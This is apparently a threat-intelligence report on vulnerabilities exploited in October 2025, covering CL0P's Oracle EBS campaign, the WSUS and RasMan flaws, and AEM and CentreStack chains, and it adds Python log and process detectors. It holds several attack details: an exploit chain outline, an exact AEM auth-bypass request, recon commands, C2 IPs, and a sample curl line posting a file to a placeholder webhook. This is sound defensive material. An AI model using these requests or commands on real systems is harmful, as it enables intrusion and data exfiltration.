October 2025 CVE Landscape: 32 High-Impact Vulnerabilities Demand Immediate Attention
October 2025 saw a significant escalation in vulnerability activity, with Recorded Future's Insikt Group® identifying 32 high-impact vulnerabilities, double the 16 identified in September's CVE report. Twenty-six of these vulnerabilities scored as Very Critical.
What security teams need to know:
- Microsoft dominates: Eight of 32 vulnerabilities affect Microsoft products, including a critical WSUS deserialization flaw (CVE-2025-59287) now being actively exploited
- CL0P ransomware group exploited an Oracle E-Business Suite zero-day (CVE-2025-61882) for data theft and extortion campaigns
- Legacy vulnerabilities persist: Five of the 14 RCE-enabling vulnerabilities are over a decade old, highlighting continued risk from unpatched legacy systems
- CWE-287 (Improper Authentication) was the most common weakness type, followed by Out-of-bounds Write and Path Traversal
Bottom line: Don't discount older CVEs. Prioritize based on observed exploitation activity, maintain continuous asset discovery (including legacy systems), and apply compensating controls when immediate remediation isn't possible.
Quick Reference: October 2025 Vulnerability Table
All 32 vulnerabilities below were actively exploited in October.
Weakness types listed in the table (only the weakness column and the Score header survived extraction):
- CWE-22 (Path Traversal)
- CWE-287 (Improper Authentication)
- CWE-444 (HTTP Request/Response Smuggling)
- CWE-501 (Trust Boundary Violation)
- CWE-918 (SSRF), CWE-93 (CRLF Injection)
- CWE-119 (Improper Restriction of Operations within the Bounds of a Memory Buffer)
- CWE-787 (Out-of-bounds Write)
- CWE-306 (Missing Authentication for Critical Function)
- CWE-77 (Command Injection)
Table 1: List of vulnerabilities that were actively exploited in September based on Recorded Future data (Source: Recorded Future)
Key Trends: October 2025
Vendors Most Affected
- Microsoft led with 8 vulnerabilities across Windows, WSUS, SMB, and legacy Internet Explorer
- Oracle faced critical exposure through E-Business Suite zero-day exploitation
- Adobe saw two critical flaws in Commerce/Magento and AEM Forms
- Additional affected vendors: Broadcom, XWiki, Dassault Systèmes, Motex, Apple, Kentico, IGEL, SKYSEA, Grafana Labs, Synacor, Linux, Mozilla, GNU, Jenkins, Juniper, Samsung, Smartbedded, and Gladinet
Most Common Weakness Types
- CWE-287 – Improper Authentication
- CWE-787 – Out-of-bounds Write
- CWE-22 – Path Traversal
- CWE-284 – Improper Access Control
- CWE-502 – Deserialization of Untrusted Data
- CWE-119 – Improper Restriction of Operations within Memory Buffer Bounds
Threat Actor Activity
CL0P ransomware group dominated October's threat landscape:
- Exploited CVE-2025-61882 (Oracle EBS zero-day) for data theft and extortion
- Deployed multi-stage Java-based infection chain: GOLDVEIN.JAVA → SAGEGIFT → SAGELEAF → SAGEWAVE
- Targeted executives across industries using compromised third-party email accounts
- Referenced extortion email addresses active on CL0P's data leak site since May 2025
Priority Alert: Active Exploitation
These vulnerabilities are under active exploitation and require immediate attention.
CVE-2025-61882 | Oracle E-Business Suite
Risk Score: 99 (Very Critical) | CISA KEV: Added October 6, 2025
Why this matters: CL0P is actively exploiting this zero-day for data theft campaigns. The vulnerability enables unauthenticated remote code execution through Oracle's Concurrent Processing/BI Publisher integration.
Affected versions: Oracle EBS 12.2.3 through 12.2.14
Immediate actions:
- Apply Oracle's emergency patch released October 4, 2025
- Review logs for requests to /OA_HTML/configurator/UiServlet
- Block known malicious IPs: 200.107.207[.]26 and 185.181.60[.]11
- Monitor for indicators of GOLDVEIN, SAGEGIFT, SAGELEAF, and SAGEWAVE malware
Exposure: ~1,430 Oracle EBS instances visible on Shodan (US, China, Germany, India, UK)
CVE-2025-59287 | Microsoft WSUS
Risk Score: 99 (Very Critical) | Active exploitation confirmed October 24, 2025
Why this matters: Attackers are targeting publicly exposed WSUS instances to achieve remote code execution. Successful exploitation could compromise your entire update distribution infrastructure.
Affected versions: Windows Server 2012 through 2025, including Server 23H2
Immediate actions:
- Install Microsoft's October 14, 2025 security update
- Block inbound connections to TCP ports 8530 and 8531 from untrusted sources
- Monitor for suspicious wsusservice.exe and w3wp.exe activity
- Review logs for Base64-encoded PowerShell commands and unusual curl.exe activity
Exposure: ~25 WSUS hosts remain publicly exposed (per Huntress)
CVE-2025-59230 | Windows RasMan
Risk Score: 99 (Very Critical) | CISA KEV: Added October 14, 2025
Why this matters: This zero-day allows privilege escalation from low-privilege user to SYSTEM-level access. Attackers are chaining this with initial access techniques for full system compromise.
Affected versions: Windows 10 (1607, 1809, 21H2, 22H2), Windows 11 (22H2–25H2), Windows Server 2008–2025
Immediate actions:
- Apply Microsoft's October 14, 2025 patch
- Disable RasMan service if not required
- Review the past 30 days of logs for suspicious rasman.exe activity
- Implement LAPS and enforce MFA
Technical Deep Dive: Exploitation Analysis
The following sections give security practitioners and incident responders a more detailed technical analysis of the most significant exploitation activity:
CL0P's Oracle E-Business Suite Campaign
On October 6, 2025, Mandiant's CTO issued an alert detailing CL0P's exploitation of CVE-2025-61882. The vulnerability stems from a chain of flaws that, when combined, enable unauthenticated remote code execution.
The exploitation chain:
- SSRF via UiServlet – Crafted XML payload to /OA_HTML/configurator/UiServlet initiates arbitrary outbound HTTP requests
- CRLF header injection – Attacker-controlled headers added to outgoing requests
- HTTP keep-alive abuse – Persistent connections chain multiple backend requests
- Path traversal – Bypasses authentication filters to reach internal JSP endpoints
- XSL template injection – Coerces JSP to fetch attacker-controlled stylesheet, executing Java extension functions for RCE
Observed post-exploitation activity:
According to GTIG and Mandiant's analysis, the threat actor:
- Distributed extortion emails targeting executives across industries
- Used compromised third-party email accounts (likely from infostealer logs)
- Deployed GOLDVEIN.JAVA to fetch second-stage payloads from C2 servers (162[.]55[.]17[.]215 and 104[.]194[.]11[.]200)
- Installed SAGEWAVE servlet filter for persistent backdoor access
- Executed reconnaissance commands: cat /etc/fstab, df -h, ip addr, netstat -an
Related Insikt Group® analysis: TTP Instance: Oracle EBS Exploitation Prior to CL0P's Extortion Campaign
Microsoft WSUS Deserialization Attack (CVE-2025-59287)
HawkTrace's October 18 analysis revealed the root cause: unsafe deserialization in the WSUS API's EncryptionHelper.DecryptData() method.
Technical breakdown:
The vulnerability allows attackers to embed malicious serialized objects in SOAP messages sent to ClientWebService.asmx. The WSUS server:
- Decrypts AuthorizationCookie data using AES-128-CBC
- Deserializes the result using .NET's BinaryFormatter.Deserialize() without validation
- Executes attacker-controlled code within the WSUS service context
Observed attack pattern (per Huntress):
- Targeting publicly exposed WSUS on ports 8530/8531
- Crafted POST requests trigger deserialization via AuthorizationCookie
- cmd.exe and PowerShell.exe spawn from wsusservice.exe and w3wp.exe
- Data exfiltration via HTTP requests and curl.exe to attacker-controlled webhooks
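As an added example (not from the report, Huntress, or HawkTrace), the following Python detection applies the WSUS guidance above to Sysmon-style process-creation records: it flags cmd.exe, PowerShell.exe or curl.exe spawned by wsusservice.exe or w3wp.exe and decodes any -EncodedCommand payload it finds. The event records, file paths and the hook.example.invalid destination are constructed sample data.

```python
import base64
import json
import re
from ntpath import basename

# Process images the report ties to CVE-2025-59287 post-exploitation activity.
WSUS_PARENTS = {"wsusservice.exe", "w3wp.exe"}
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "curl.exe"}
# PowerShell's encoded-command switch (and its abbreviations) followed by a Base64 blob.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")

# Constructed Sysmon Event ID 1 records as JSON lines (sample data, not real telemetry).
ENCODED_WHOAMI = base64.b64encode("whoami".encode("utf-16le")).decode()  # benign constructed payload
SAMPLE_EVENTS = "\n".join(json.dumps(e) for e in [
    {"ParentImage": r"C:\Program Files\Update Services\Service\WsusService.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"cmd.exe /c powershell.exe -nop -w hidden -enc {ENCODED_WHOAMI}"},
    {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -X POST -d @out.txt https://hook.example.invalid/"},  # placeholder URL
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c dir"},
])


def decode_powershell(cmdline: str):
    """Return the decoded -EncodedCommand payload (Base64 of UTF-16LE), or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_events(jsonl: str) -> list:
    """Flag shell/curl children of WSUS processes and decode any encoded PowerShell they carry."""
    findings = []
    for line in jsonl.splitlines():
        ev = json.loads(line)
        parent, child = basename(ev["ParentImage"]).lower(), basename(ev["Image"]).lower()
        if parent not in WSUS_PARENTS or child not in SUSPICIOUS_CHILDREN:
            continue
        finding = {"parent": parent, "child": child, "decoded": decode_powershell(ev["CommandLine"])}
        if child == "curl.exe":
            finding["note"] = "possible exfiltration to attacker-controlled webhook"
        findings.append(finding)
    return findings
```

Run `analyze_events(SAMPLE_EVENTS)` to see the two flagged events; the explorer.exe-spawned cmd.exe is ignored because its parent is not a WSUS process.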
Windows RasMan Privilege Escalation (CVE-2025-59230)
Cyberthint's analysis details how insufficient access validation in the RasMan service enables privilege escalation.
Attack chain scenario:
- Initial access – Phishing, RDP brute-force, or weak credentials
- Privilege escalation – Exploit CVE-2025-59230 to gain SYSTEM
- Persistence – Create services or scheduled tasks
- Lateral movement – Use credentials for network propagation
- Impact – Ransomware deployment, data exfiltration, or service disruption
Adobe AEM Forms RCE (CVE-2025-54253)
Searchlight Cyber's July 29 disclosure revealed a pre-authentication Struts2 DevMode chain enabling unauthenticated OGNL execution.
Key details:
- Authentication bypass via URLs containing login. (passes com.adobe.framework.SecurityFilter)
- Struts DevMode enabled (struts.devMode="true") permits OGNL evaluation
- Simple exploitation: GET /adminui/updateLicense1.do;login.?debug=command&expression=7*7
Exposure: ~418 AEM instances on Shodan (US, Australia, Germany, Canada, Ireland)
Remediation: Upgrade to AEM version 6.5.0-0108 or later
Gladinet CentreStack/Triofox LFI (CVE-2025-11371)
Huntress's October 15 report documented active exploitation of this local file inclusion vulnerability.
Why it's dangerous: When chained with CVE-2025-30406, attackers achieve RCE via ViewState deserialization.
Observed attack pattern:
- LFI via /storage/t.dn endpoint to exfiltrate Web.config
- Extract ASP.NET machineKey from config
- Craft signed ViewState payloads for command execution
- Execute commands, redirect output to file, retrieve via same LFI
Remediation: Upgrade to version 16.10.10408.56683+
Exposure: ~1,528 CentreStack instances on Shodan (US, China, Germany, UK, Singapore)
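As an added example (not part of the Recorded Future report or any vendor tooling), the following Python script applies the log-review guidance from the Oracle EBS, AEM Forms and CentreStack/Triofox sections to web server access logs: it flags requests to the UiServlet path, the ;login. plus debug=command pattern, and the /storage/t.dn endpoint, and also any request from the IPs the report lists. The access-log lines are constructed sample data.

```python
import re
from urllib.parse import unquote

# Constructed Apache combined-format access log lines (sample data, not real traffic).
SAMPLE_LOG = """\
200.107.207.26 - - [06/Oct/2025:10:01:12 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 200 512 "-" "curl/8.0"
10.0.0.5 - - [06/Oct/2025:10:02:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.7 - - [07/Oct/2025:11:15:44 +0000] "GET /adminui/updateLicense1.do;login.?debug=command&expression=7*7 HTTP/1.1" 200 33 "-" "python-requests/2.31"
198.51.100.9 - - [15/Oct/2025:09:30:00 +0000] "GET /storage/t.dn HTTP/1.1" 200 1200 "-" "Mozilla/5.0"
192.0.2.3 - - [15/Oct/2025:09:31:00 +0000] "GET /index.html HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

# IPs the report associates with the CL0P Oracle EBS campaign (defanged in the report).
KNOWN_BAD_IPS = {"200.107.207.26", "185.181.60.11", "162.55.17.215", "104.194.11.200"}

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')


def classify_uri(uri: str) -> list:
    """Map a request URI to the exploitation patterns described in the report."""
    u = unquote(uri).lower()  # normalise percent-encoding and case before matching
    hits = []
    if u.startswith("/oa_html/configurator/uiservlet"):
        hits.append("CVE-2025-61882: Oracle EBS UiServlet request")
    if ";login." in u and "debug=command" in u:
        hits.append("CVE-2025-54253: AEM Forms auth bypass + Struts DevMode")
    if u.startswith("/storage/t.dn"):
        hits.append("CVE-2025-11371: CentreStack/Triofox LFI endpoint")
    return hits


def scan_access_log(text: str) -> list:
    """Return one finding per log line that matches a URI pattern or comes from a listed IP."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        reasons = classify_uri(m["uri"])
        if m["ip"] in KNOWN_BAD_IPS:
            reasons.append("source IP listed in the report as CL0P infrastructure")
        if reasons:
            findings.append({"line": lineno, "ip": m["ip"], "uri": m["uri"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['ip']} {f['uri']} -> {'; '.join(f['reasons'])}")
```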
Detection & Remediation Resources
Nuclei Templates from Insikt Group®
Recorded Future customers can access Nuclei templates.
Note: All templates are designed for authorized environments only and do not modify system state.
Recorded Future Product Integrations
- Vulnerability Intelligence – Prioritize by exploitation likelihood, not just severity
- Attack Surface Intelligence – Identify internet-facing assets vulnerable to specific CVEs
- Third-Party Intelligence – Assess vendor security posture without manual research
October 2025 Summary
October's vulnerability landscape reinforced critical lessons for security teams:
Legacy systems remain high-value targets. Five of the 14 RCE-enabling vulnerabilities are over a decade old. Attackers continue exploiting unpatched legacy systems and internet-facing applications.
Zero-days demand rapid response. CL0P's exploitation of CVE-2025-61882 within days of disclosure demonstrates the shrinking window between vulnerability publication and weaponization.
Authentication flaws dominate. CWE-287 (Improper Authentication) was the most common weakness type—a reminder that identity and access controls remain foundational security priorities.
Take Action
Ready to see how Recorded Future can help your team prioritize vulnerabilities, detect active exploitation, and reduce risk across your attack surface? Check out our demo center. Or, dive into more Insikt Group research.
About Insikt Group®:
Recorded Future’s Insikt Group® threat research team is made up of analysts, linguists, and security researchers with deep government and industry experience.
Insikt Group® publishes threat intelligence to the Recorded Future analyst community in blog posts and analyst notes.